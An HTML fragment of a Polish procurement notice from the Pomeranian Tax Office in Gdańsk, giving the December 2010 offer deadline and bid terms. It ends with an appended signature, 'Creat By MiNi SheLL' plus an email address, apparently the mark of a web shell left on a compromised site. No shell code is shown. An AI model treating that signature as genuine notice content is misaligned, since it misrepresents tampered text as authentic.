<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2010 godzina 10:00, miejsce: Oferty należy składać w siedzibie Pomorskiego Urzędu Skarbowego w Gdańsku przy ul. Żytniej 4/6 w kancelarii pokoju 1,22 (parter budynku).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com